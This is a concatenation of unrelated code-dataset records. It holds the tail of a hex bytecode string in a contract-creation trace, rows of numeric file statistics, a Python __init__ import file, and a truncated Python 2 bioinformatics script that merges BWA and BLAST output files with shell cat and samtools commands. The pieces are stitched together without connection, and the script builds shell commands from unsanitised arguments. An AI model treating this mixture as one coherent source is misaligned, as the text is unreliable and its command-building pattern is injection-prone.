2806000526040600020600091509150505481565b6000600454905060008111613357576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330303100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b61336384848484611bbe565b50505050565b6060600060035467ffffffffffffffff8111801561338657600080fd5b506040519080825280602002602001820160405280156133b55781602001602082028036833780820191505090505b50905060008060026000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690505b600173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614613509578083838151811061346057fe5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600260008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050818060010192505061341f565b82935050505090565b60055481565b600080825160208401855af4806000523d6020523d600060403e60403d016000fd5b6135858a8a80806020026020016040519081016040528093929190818152602001838360200280828437600081840152601f19601f820116905080830192505050505050508961514a565b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16146135c3576135c28461564a565b5b6136118787878080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f82011690508083019250505050505050615679565b600082111561362b5761362982600060018685614f44565b505b3373ffffffffffffffffffffffffffffffffffffffff167f141df868a6331af528e38c83b7aa03edc19be66e37ae67f9285bf4f8e3c6a1a88b8b8b8b8960405180806020018581526020018473ffffffffffffffffffffffffffffffffffffffff1681526020018373ffffffffffffffffffffffffffffffffffffffff16815260200
18281038252878782818152602001925060200280828437600081840152601f19601f820116905080830192505050965050505050505060405180910390a250505050505050505050565b6000805a905061374f878787878080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f82011690508083019250505050505050865a614e8d565b61375857600080fd5b60005a8203905080604051602001808281526020019150506040516020818303038152906040526040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b838110156137e55780820151818401526020810190506137ca565b50505050905090810190601f1680156138125780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b606060008267ffffffffffffffff8111801561383b57600080fd5b5060405190808252806020026020018201604052801561386a5781602001602082028036833780820191505090505b509150600080600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690505b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415801561393d5750600173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b801561394857508482105b15613a03578084838151811061395a57fe5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600160008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081806001019250506138d3565b80925081845250509250929050565b600073ffffffffffffffffffffffffffffffffffffffff16600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673fffffffffffffffffffff
fffffffffffffffffff161415613b14576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330333000000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b6001600860003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000838152602001908152602001600020819055503373ffffffffffffffffffffffffffffffffffffffff16817ff2a0eb156472d1440255b0d7c1e19cc07115d1051fe605b0dce69acfec884d9c60405160405180910390a350565b6000613bc68c8c8c8c8c8c8c8c8c8c8c61466f565b8051906020012090509b9a5050505050505050505050565b613be6614d62565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614158015613c505750600173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b613cc2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475331303100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614613dc2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475331303300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600160008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173fffffffffffffffffffffffffffffffffffff
fff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055507faab4fa2b463f581b2b32cb3b7e3b704b9ce37cc209b5fb4d77e593ace405427681604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a15050565b613f77614d62565b60007f4a204f620c8c5ccdca3fd54d003badd85ba500436a431f0cbda4f558c93c34c860001b90508181557f1151116914515bc0891ff9047a6cb32cf902546f83066499bcf8ba33d2353fa282604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a15050565b613ffb614d62565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141580156140655750600173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b801561409d57503073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b61410f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614614210576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303400000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415801561427a5750600173ffffffffffffffffffffffffffffffffffffffff168273fffffff
fffffffffffffffffffffffffffffffff1614155b6142ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b8173ffffffffffffffffffffffffffffffffffffffff16600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146143ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303500000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555080600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055507ff8d49fc529812e9a7c5c50e69c20f0dccc0db8fa95c98bc58cc9a4f1c1299eaf82604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a17f9465fa0c962cc76958e6373a993326400c1c94f8be2fe3a952adfa7f60b2ea2681604051808273fffffffffffffffffffffffffffffffffffff
fff16815260200191505060405180910390a1505050565b6000600454905090565b606060007fbb8310d486368db6bd6f849402fdd73ad53d316b5a4b2644ad6efe0f941286d860001b8d8d8d8d60405180838380828437808301925050509250505060405180910390208c8c8c8c8c8c8c604051602001808c81526020018b73ffffffffffffffffffffffffffffffffffffffff1681526020018a815260200189815260200188600181111561470057fe5b81526020018781526020018681526020018581526020018473ffffffffffffffffffffffffffffffffffffffff1681526020018373ffffffffffffffffffffffffffffffffffffffff1681526020018281526020019b505050505050505050505050604051602081830303815290604052805190602001209050601960f81b600160f81b61478c614878565b8360405160200180857effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff19168152600101847effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff191681526001018381526020018281526020019450505050506040516020818303038152906040529150509b9a5050505050505050505050565b61481f614d62565b6148288161564a565b7f5ac6c46c93c8d0e53714ba3b53db3e7c046da994313d7ed0d192028bc7c228b081604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a150565b60007f47e79534a245952e8b16893a336b85a3d9ea9fa8c573f3d803afb92a7946921860001b6148a66125e4565b30604051602001808481526020018381526020018273ffffffffffffffffffffffffffffffffffffffff168152602001935050505060405160208183030381529060405280519060200120905090565b6148fe614d62565b806001600354031015614979576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141580156149e35750600173ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b614a55576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f4753323033000000000000000000000000000
00000000000000000000000000081525060200191505060405180910390fd5b8173ffffffffffffffffffffffffffffffffffffffff16600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614614b55576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303500000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600360008154809291906001900391905055507ff8d49fc529812e9a7c5c50e69c20f0dccc0db8fa95c98bc58cc9a4f1c1299eaf82604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a18060045414614d2457614d2381612c3e565b5b505050565b6040518060400160405280600581526020017f312e332e3000000000000000000000000000000000000000000000000000000081525081565b3073ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614614e03576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330333100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b565b600080831415614e185760009050614e39565b60008284029
05082848281614e2957fe5b0414614e3457600080fd5b809150505b92915050565b60008060008360410260208101860151925060408101860151915060ff60418201870151169350509250925092565b600080828401905083811015614e8357600080fd5b8091505092915050565b6000600180811115614e9b57fe5b836001811115614ea757fe5b1415614ec0576000808551602087018986f49050614ed0565b600080855160208701888a87f190505b95945050505050565b6000807f4a204f620c8c5ccdca3fd54d003badd85ba500436a431f0cbda4f558c93c34c860001b9050805491505090565b600081831015614f1a5781614f1c565b825b905092915050565b600082821115614f3357600080fd5b600082840390508091505092915050565b600080600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614614f815782614f83565b325b9050600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16141561509b57614fed3a8610614fca573a614fcc565b855b614fdf888a614e6e90919063ffffffff16565b614e0590919063ffffffff16565b91508073ffffffffffffffffffffffffffffffffffffffff166108fc839081150290604051600060405180830381858888f19350505050615096576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330313100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b615140565b6150c0856150b2888a614e6e90919063ffffffff16565b614e0590919063ffffffff16565b91506150cd8482846158b4565b61513f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330313200000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b5b5095945050505050565b6000600454146151c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303000000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b8151811115615239576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252600581526020018
07f475332303100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60018110156152b0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303200000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60006001905060005b83518110156155b65760008482815181106152d057fe5b60200260200101519050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141580156153445750600173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b801561537c57503073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b80156153b457508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b615426576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614615527576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303400000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508092505080806001019150506152b9565b506001600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602
00190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550825160038190555081600481905550505050565b60007f6c9a6c4a39284e37ed1cf53d337577d14212a4870fb976a4366c693b939918d560001b90508181555050565b600073ffffffffffffffffffffffffffffffffffffffff1660016000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461577b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475331303000000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b6001806000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16146158b05761583d8260008360015a614e8d565b6158af576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330303000000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b5b5050565b60008063a9059cbb8484604051602401808373ffffffffffffffffffffffffffffffffffffffff168152602001828152602001925050506040516020818303038152906040529060e01b6020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff83818316178352505050509050602060008251602084016000896127105a03f13d6000811461595b5760208114615963576000935061596e565b81935061596e565b600051158215171593505b505050939250505056fea26469706673582212203874bcf92e1722cc7bfa0cef1a0985cf0dc3485ba0663db3747ccdf1605df53464736f6c63430007060033"
),
"address": "0xd9Db270c1B5E3Bd161E8c8503c55cEABeE709552",
},
"subtraces": 0,
"traceAddress": [0],
"transactionHash": "0x0b04589bdc11585fb98f270b1bfeff0fb3bbb3c56d35b104f62d8115d6f7c57f",
"transactionPosition": 12,
"type": "create",
}
]
| 3,197.62069 | 46,018 | 0.995924 | 40 | 92,731 | 2,308.75 | 0.825 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.686779 | 0.003073 | 92,731 | 28 | 46,019 | 3,311.821429 | 0.312182 | 0 | 0 | 0.074074 | 0 | 0 | 0.994975 | 0.993562 | 0 | 1 | 0.993562 | 0 | 0 | 1 | 0 | false | 0 | 0.037037 | 0 | 0.037037 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
06ffacf0b90b7ce27bf22e4bf5f4c02d3ce689b6 | 234 | py | Python | lightning_transformers/task/nlp/multiple_choice/datasets/__init__.py | maksym-taranukhin/lightning-transformers | aa7202657973b5b65c3c36eb745621043859ebc4 | [
"Apache-2.0"
] | 451 | 2021-04-21T15:53:59.000Z | 2022-03-29T10:39:45.000Z | lightning_transformers/task/nlp/multiple_choice/datasets/__init__.py | mathemusician/lightning-transformers | b2ef06113433e6a178ce4d3c9df7ede8064e247f | [
"Apache-2.0"
] | 92 | 2021-04-21T18:42:58.000Z | 2022-03-30T05:29:54.000Z | lightning_transformers/task/nlp/multiple_choice/datasets/__init__.py | mathemusician/lightning-transformers | b2ef06113433e6a178ce4d3c9df7ede8064e247f | [
"Apache-2.0"
] | 51 | 2021-04-22T05:35:28.000Z | 2022-03-17T13:08:12.000Z | from lightning_transformers.task.nlp.multiple_choice.datasets.race import RaceMultipleChoiceDataModule # noqa: F401
from lightning_transformers.task.nlp.multiple_choice.datasets.swag import SwagMultipleChoiceDataModule # noqa: F401
| 78 | 116 | 0.871795 | 26 | 234 | 7.692308 | 0.576923 | 0.13 | 0.25 | 0.29 | 0.54 | 0.54 | 0.54 | 0.54 | 0 | 0 | 0 | 0.027523 | 0.068376 | 234 | 2 | 117 | 117 | 0.889908 | 0.089744 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
6630183781174b0f9157fef249a22516ceaf5e95 | 26,787 | py | Python | concat_files_standalone.py | ChandraPedamallu/PathSeq | 2d92791713a7350ad6eb0540bf9cddad46b50049 | [
"MIT"
] | 9 | 2018-02-04T23:45:14.000Z | 2021-05-13T05:30:58.000Z | concat_files_standalone.py | ChandraPedamallu/PathSeq | 2d92791713a7350ad6eb0540bf9cddad46b50049 | [
"MIT"
] | 5 | 2017-07-10T12:56:19.000Z | 2018-11-13T19:52:29.000Z | concat_files_standalone.py | ChandraPedamallu/PathSeq | 2d92791713a7350ad6eb0540bf9cddad46b50049 | [
"MIT"
] | 2 | 2017-10-16T21:30:08.000Z | 2019-12-30T11:02:22.000Z | #!/usr/bin/env python
# Created: Chandra Sekhar Pedamallu, DFCI, The Broad Institute
# Email : pcs.murali@gmail.com
# Purpose: PathSeq V2.0 pipeline
# Updates: Concatenate output files Standalone
# DFCI / Broad Institute@ copyright
import sys
import os
import commands
import random
import time
start_time = time.time()  # record wall-clock start of the concatenation step
print "CONCATENATE\n"
# Arguments (positional, taken verbatim from the command line; Python 2 script)
args=sys.argv
print "Step 0: Read config, premegablast, megablast, and blastn config files"
# Strip off spaces in front of and behind each argument and get the file names
namefile = args[1].strip() # Read in FQ1 format; used below as the per-shard result-file prefix
configfile = args[2].strip() # aligner config file: one "TOOL:..." entry per line, drives the branch per database
pdir=args[3].strip() # presumably the pipeline/scripts directory — not referenced in this chunk; TODO confirm
cdir=args[4].strip() # working directory holding the per-shard outputs; merged files go to <cdir>/combine_results
id_step=args[5].strip() # step identifier embedded in every merged output file name
namefile_o=args[6].strip() # output name — not referenced in this chunk; TODO confirm intended use
mergesamjar=args[7].strip() # MergeSam jar path (only used by the commented-out java merge code below)
javaloc=args[8].strip() # java binary location (only used by the commented-out java merge code below)
tmpdir=args[9].strip() # temp dir for java (only used by the commented-out java merge code below)
Samtools=args[10].strip() # samtools binary; used to "merge" the per-shard BWA SAM files
# Build and run "mkdir <cdir>/combine_results", the destination for all merged outputs.
mkdir_file = "mkdir " +cdir
mkdir_file = mkdir_file + "/"
mkdir_file = mkdir_file + "combine_results"
print mkdir_file
# commands.getstatusoutput returns a (status, output) tuple; failures are only
# printed here, never checked — a pre-existing combine_results dir is tolerated.
mkdir_file_cmd=commands.getstatusoutput(mkdir_file)
print mkdir_file_cmd
# Read the aligner config; each line selects one concatenation branch in the loop below.
ff = open(configfile, 'r')
database = ff.readlines()
ff.close()
dbindex=0 # 1-based database counter, appended as the "_<dbindex>" suffix of merged file names
for no_databases1 in database:
dbindex = dbindex + 1
line = no_databases1.strip()
data_split=line.split(":")
print data_split
if data_split[0] == "BWA":
print "BWA Concate";
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"*.bwa."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +".stat >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/BWA."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +".stat"
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"*"
concate_files = concate_files +".unmappedbwa.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
concate_files = concate_files +"BWA"
concate_files = concate_files +".unmappedbwa.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
# List all Samfiles in the directory into a file
lst_samfiles = "ls " + cdir
lst_samfiles = lst_samfiles +"/"
lst_samfiles = lst_samfiles +"*"
lst_samfiles = lst_samfiles +"."
lst_samfiles = lst_samfiles +str(id_step)
lst_samfiles = lst_samfiles +"_"
lst_samfiles = lst_samfiles +str(dbindex)
lst_samfiles = lst_samfiles +".aln.sam | xargs -n 1 > "
lst_samfiles = lst_samfiles + cdir
lst_samfiles = lst_samfiles +"/"
lst_samfiles = lst_samfiles +"combine_results/"
lst_samfiles = lst_samfiles +"lstSamfiles."
lst_samfiles = lst_samfiles +str(id_step)
lst_samfiles = lst_samfiles +"_"
lst_samfiles = lst_samfiles +str(dbindex)
print "**************************"
print lst_samfiles
print "**************************"
lst_samfiles_cmd=commands.getstatusoutput(lst_samfiles)
print lst_samfiles_cmd
# File name with list of samfiles
lst_sam_filename=cdir + "/"
lst_sam_filename=lst_sam_filename+"combine_results/"
lst_sam_filename=lst_sam_filename+"lstSamfiles."
lst_sam_filename=lst_sam_filename+str(id_step)
lst_sam_filename=lst_sam_filename+"_"
lst_sam_filename=lst_sam_filename+str(dbindex)
print lst_sam_filename
# Read the File with list of samfiles
flst_samfiles = open(lst_sam_filename, 'r')
samfile_list = flst_samfiles.readlines()
print samfile_list
# Merge the sam files
mergesam_cmd= Samtools + " merge "
mergesam_cmd= mergesam_cmd + cdir
mergesam_cmd= mergesam_cmd + "/combine_results/"
mergesam_cmd= mergesam_cmd + "BWAalignedsamfile."
mergesam_cmd= mergesam_cmd + str(id_step)
mergesam_cmd= mergesam_cmd + "_"
mergesam_cmd= mergesam_cmd + str(dbindex)
mergesam_cmd= mergesam_cmd + ".sam"
for samfile_list1 in samfile_list:
line_samfilelst = samfile_list1.strip()
mergesam_cmd=mergesam_cmd+" "
mergesam_cmd=mergesam_cmd+line_samfilelst
#mergesam_cmd= javaloc + " -jar "
#mergesam_cmd= mergesam_cmd + mergesamjar
#mergesam_cmd= mergesam_cmd + " TMP_DIR="
#mergesam_cmd= mergesam_cmd + tmpdir
#mergesam_cmd= mergesam_cmd + " VALIDATION_STRINGENCY=SILENT OUTPUT="
#mergesam_cmd= mergesam_cmd + cdir
#mergesam_cmd= mergesam_cmd + "/combine_results/"
#mergesam_cmd= mergesam_cmd + "BWAalignedsamfile."
#mergesam_cmd= mergesam_cmd + str(id_step)
#mergesam_cmd= mergesam_cmd + "_"
#mergesam_cmd= mergesam_cmd + str(dbindex)
#mergesam_cmd= mergesam_cmd + ".sam"
#for samfile_list1 in samfile_list:
# line_samfilelst = samfile_list1.strip()
# mergesam_cmd=mergesam_cmd+" INPUT="
# mergesam_cmd=mergesam_cmd+line_samfilelst
ff.close()
mergesam_run=commands.getstatusoutput(mergesam_cmd)
print mergesam_run
elif data_split[0] == "MEGABLAST":
print "MEGABLAST Concate";
filename=cdir + "/"
filename=filename + "combine_results/"
filename=filename +"Megablast"
filename=filename +".mega.annotate.hittable."
filename=filename +str(id_step)
filename=filename +"_"
filename=filename +str(dbindex)
finaloutname=open(filename,'w')
finaloutname.write("Read_Name\tRead_Length\tHit_numb\tSubject_id\tMapped_Subject\tSubject_Acession_Number\tSubject_Length\tBit_score\tE-value\tHSP_hit_starts\tHSP_hit_ends\tHSP_Identity\tHSP_alignlength\tPercentage_identity\tQuery_coverage\tHSP_start\tHSP_end\tAlignedSeq\tFullQuery\tKingdom\tSubjectName\n")
finaloutname.close()
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".mega.annotate.hittable."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >> "
concate_files = concate_files +filename
#concate_files = concate_files + cdir
#concate_files = concate_files +"/"
#concate_files = concate_files +"combine_results/"
#concate_files = concate_files +"Megablast"
#concate_files = concate_files +".annotate.hittable."
#concate_files = concate_files +str(id_step)
#concate_files = concate_files +"_"
#concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".unmappedmega.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files + "Megablast"
concate_files = concate_files +".unmappedmega.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".mappedmega.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files +"Megablast"
concate_files = concate_files +".mappedmega.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
elif data_split[0] == "BLASTN":
print "BLASTN Concate";
filename=cdir + "/"
filename=filename + "combine_results/"
filename=filename +"Blastn"
filename=filename +".blastn.annotate.hittable."
filename=filename +str(id_step)
filename=filename +"_"
filename=filename +str(dbindex)
